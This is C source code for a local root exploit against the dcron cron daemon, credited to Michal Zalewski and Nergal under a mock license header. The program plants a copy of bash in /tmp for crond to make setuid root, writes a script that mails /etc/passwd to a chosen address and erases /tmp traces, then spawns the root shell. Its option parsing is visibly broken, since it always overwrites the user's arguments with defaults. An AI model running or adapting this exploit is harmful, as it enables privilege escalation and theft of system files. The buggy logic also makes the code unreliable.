/***********************************************
* released under (E) licensing ... *
* (E) RULES AND REGULATIONS *
* permission to use/rewrite/add : granted *
* permission to trojan/steal : denied *
* permission to use illegally : denied *
* permission to use on /dev/urandom : denied *
***********************************************/
/* contact el8@press.co.jp for full license */
/* code copyrighted by ~el8 -- don't infringe! */
/*************************************************************************\
| ----====----====---- . . LOCAL DCRON EXPLOIT . . ----====----====---- |
| |
| brought to you by |
| |
| (C) Michal Zalewski <lcamtuf@ids.pl> . and . Nergal <nergal@icm.edu.pl> |
| |
| ----------------------------------------------------------------------- |
| Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] |
| ----------------------------------------------------------------------- |
| |
\*************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define PRINT_STATUS(x,p...) printf("\033[1;35m:::\033[0;35m "x,##p)
char*cron_path;
char*email_address;
extern char**environ;
void print_banner(void) {
printf("\033[1;37m\t\t ---===---===--- \033[0;31md\033[1;31mcron ");
printf("\033[1;33mLOCAL \033[1;36m EXPLOIT \033[1;37m---===---===---\n");
}
void print_help(void) {
printf("\n\t\tUsage:");
printf("\t\033[0;35m./dcron -e your_email [-p path_to_crond]\n");
printf("\033[0;37m\n");
}
void make_tempfile(void) {
FILE*temp;
char*file="nnn";
if((temp=fopen(file,"w"))==NULL) {
perror("fopen!!!");
(void)exit(1);
}
fprintf(temp,"###############################\n");
fprintf(temp,"## DCRON EXPLOIT - TEMP FILE ##\n");
fprintf(temp,"###############################\n");
fprintf(temp,"\n");
fprintf(temp,"crontab - << EOF\n");
fprintf(temp,"* * * * * %s\n",cron_path);
fprintf(temp,"EOF\n");
fprintf(temp,"\n");
fprintf(temp,"mail %s < /etc/passwd\n",email_address);
fprintf(temp,"chmod 4755 /tmp/boomsh\n");
fprintf(temp,"rm -f /tmp/cron* /tmp/gcc*\n");
fprintf(temp,"\n");
fprintf(temp,"crontab -d 2>&1 1>/dev/null\n");
fprintf(temp,"printf '\033[0;37m'\n");
fprintf(temp,"\n");
fprintf(temp,"## DONE!\n");
fflush(temp);
fclose(temp);
(void)chmod(file,0755);
PRINT_STATUS("Tempfile ready!\n");
}
void add_crontab_entry(void) {
int status;
pid_t pid;
if((pid=fork())==0) {
(void)execl("/usr/bin/crontab","-c","./",NULL);
(void)_exit(-1);
}
(void)sleep(1);
(void)waitpid(pid,&status,0);
}
void remove_crontab_entry(void)
{
int status;
pid_t pid;
if((pid=fork())==0) {
(void)execl("/usr/bin/crontab","-d","./",NULL);
(void)_exit(-1);
}
(void)sleep(1);
(void)waitpid(pid,&status,0);
}
void bombard_crond(void) {
int i;
setenv("PATH","/var/spool/cron:/usr/bin:.:/bin/:/usr/sbin",1);
for(i=0;i<3;i++) {
PRINT_STATUS("Adding a crontab entry ... \033[1;32m(%d/3)\n",i+1);
add_crontab_entry();
PRINT_STATUS("Removing the entry ... \033[1;32m(%d/3)\n",i+1);
remove_crontab_entry();
}
PRINT_STATUS("Processing...!!\n");
}
void make_boomsh(void) {
u_char buf[5000];
int sh,boomsh,e;
sh=open("/bin/bash",O_RDONLY);
if(sh==-1) {
perror("copy!!!");
(void)exit(1);
}
boomsh=open("/tmp/boomsh",O_WRONLY|O_CREAT);
if(boomsh==-1) {
perror("copy!!!");
(void)exit(1);
}
while((e=read(sh,buf,5000))>0) {
(void)write(boomsh,buf,e);
}
(void)close(sh);
(void)close(boomsh);
(void)chmod("/tmp/boomsh",0755);//crond will make it 4755 root!!!
}
void shell(void) {
PRINT_STATUS("\033[1;37m ----====---- \033[1;36m EXPLOIT \033[1;32m FINISHED \033[1;37m ----====----\n");
PRINT_STATUS("\033[1;37m ---====-- \033[1;34m WAITING \033[1;35m FOR\033[5;33m ROOTSHELL! \033[1;37m --====---\n");
PRINT_STATUS("\033[1;37m ---====-- \033[1;34m HIT RETURN \033[1;35m TO
\033[5;33m SYNC!!!! \033[1;37m --====---\n");
PRINT_STATUS("\033[1;37m ----=====---- \033[1;32m!\033[1;34m!\033[5;0n!\033[1;33m!\033[5;0n!\033[5;0n!\033[0;30m ----====----\n");
execle("/tmp/boomsh","boomsh",NULL,environ);
}
#define DEFAULT_EMAIL_ADDRESS "your-address@mail.com"
#define DEFAULT_CRON_PATH "/usr/sbin/crond"
char* email_address = DEFAULT_EMAIL_ADDRESS;
char* cron_path = DEFAULT_CRON_PATH;
void get_options(int argc,char*argv[])
{
int a;
#define GETOPT_ARGUMENTS "p:e:h"
while((a=getopt(argc,argv,GETOPT_ARGUMENTS))!=EOF) {
switch(a) {
case 'p':
cron_path=(char*)strdup(optarg);
break;
case 'e':
email_address=(char*)strdup(optarg);
break;
case 'h':
default:
(void)print_help();
(void)exit(0);
}
}
if(cron_path) {
cron_path=DEFAULT_CRON_PATH;
}
if(email_address) {
email_address=DEFAULT_EMAIL_ADDRESS;
}
}
// MAIN
int main (int argc,char*argv[]) {
(void)print_banner();
if(argc<2) {
(void)print_help();
(void)exit(0);
}
(void)get_options(argc,argv);
PRINT_STATUS("Making /tmp/boomsh...\n");
(void)make_boomsh();
PRINT_STATUS("Making tempfile...\n");
(void)make_tempfile();
PRINT_STATUS("Bombing crond...\n");
(void)bombard_crond();
PRINT_STATUS("ROOTSHELL ENJOY!!!\n");
(void)shell();
}
syntax highlighted by Code2HTML, v. 0.9.1